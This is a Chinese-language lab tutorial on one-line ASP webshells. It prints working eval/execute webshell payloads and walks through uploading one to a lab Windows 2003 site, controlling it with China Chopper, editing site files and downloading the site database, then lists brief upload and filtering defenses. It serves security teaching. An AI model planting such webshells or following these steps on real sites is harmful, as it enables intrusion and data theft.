课程编写
别内容
题名称L003001041-一句话木马测试分析
与要求熟悉一句话木马的原理,掌握一句话木马的使用以及防御方法
(虚拟PC)操作系统类型:windows server 2003和windows XP professional,网络接口:本地连接连接要求PC 网络接口,本地连接与实验网络直连
描述中国菜刀
环境描述1、学生机与实验室网络直连;
2、VPC1与实验室网络直连;
3、学生机与VPC1物理链路连通;
知识
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request("value")%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。
(不知道数据库也可以request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。
)
这就被称为一句话木马,它是基于B/S结构的。
内容理解该漏洞的实现过程
步骤
学生登录实验场景的操作
1、学生单击“网络拓扑”进入实验场景,单击windows2003中的“打开控制台”按钮,进入目标
我们把windows2003机器作为服务机(ip地址为192.168.1.154,不固定)
2、学生输入账号Administrator ,密码123456,登录到实验场景中的Windows server 2003,在该网站,并且能够正常访问。
如图所示:
3、学生输入账号Administrator ,密码123456,登录到实验场景中的Windows XP Professional。
4.打开windows 2003上的网站,我们通过名小子或者啊D获取到了后台地址(这两个工具的使用方法和啊Dsql注入实例),以及用户名和密码(均是admin),然后登陆进去。
如图所示:
5.然后看到左边有一个文件上传菜单,点击它。
如图所示:
6.接下来我们可以在本地创建一个包含有一个一句话木马的asp文件。
内容为“<%eval request("6"号里的6是咱们连接一句话的密码,密码也可以自行设置。
如图所示:
7.将刚才新建的文档,重命名为7.asp。
如图所示:
8.然后回到后台,单机浏览,选择刚才新建的7.asp文件。
如图所示:
9.点击打开后,进行上传,标题出写为8,并点击提交按钮。
如图所示:
10. 提交完成后,就可以看到7.asp的保存路径了。
如图所示:
11.然后我们在浏览器里进行访问。
如图所示:
12.此处一片空白,说明我们上传的木马上传成功并可以执行。
然后打开中国菜刀进行连接。
进入到打开chopper.exe。
如图所示:
13.默认情况下,中国菜刀自己会有几个示例。
我们右击空白处,选择添加。
如图所示:
14.把刚才访问asp文件的地址放进地址栏,右侧输入连接密码“6”。
下方默认类别不用改,脚本(Eval)类型,字符编码选择GB2312。
如图所示:
15.添加完毕后,我们右击该记录,然后选择文件管理。
如图所示:
16.接下来我们就会连接到刚才上传07.asp文件的目录。
如图所示:
17.我们可以进入网站根目录article,可以编辑任何文件,右击要编辑的文件。
如图所示:
18.会打开一个新的编辑框,编辑完后点击上方的保存按钮即可。
19.另外还可以进行上传下载文件,比如我们可以将测试网站的数据库article数据库下载下来。
右选择下载文件。
如图所示:
20.接下来选择要保存article.mdb的路径,保存到桌面上,然后点击保存。
21.接下来待会就可以看到article.mdb保存到桌面上了。
如图所示:
22.另外我们通过中国菜刀还可以看到其他盘符的内容。
23.关于此类攻击手段的防护措施:
23.1禁止上传脚本文件,并对上传文件夹的目录的执行脚本禁止掉。
23.2另外就是网站开发人员,对get和post提交的内容中的execute,eval等内容进行过滤。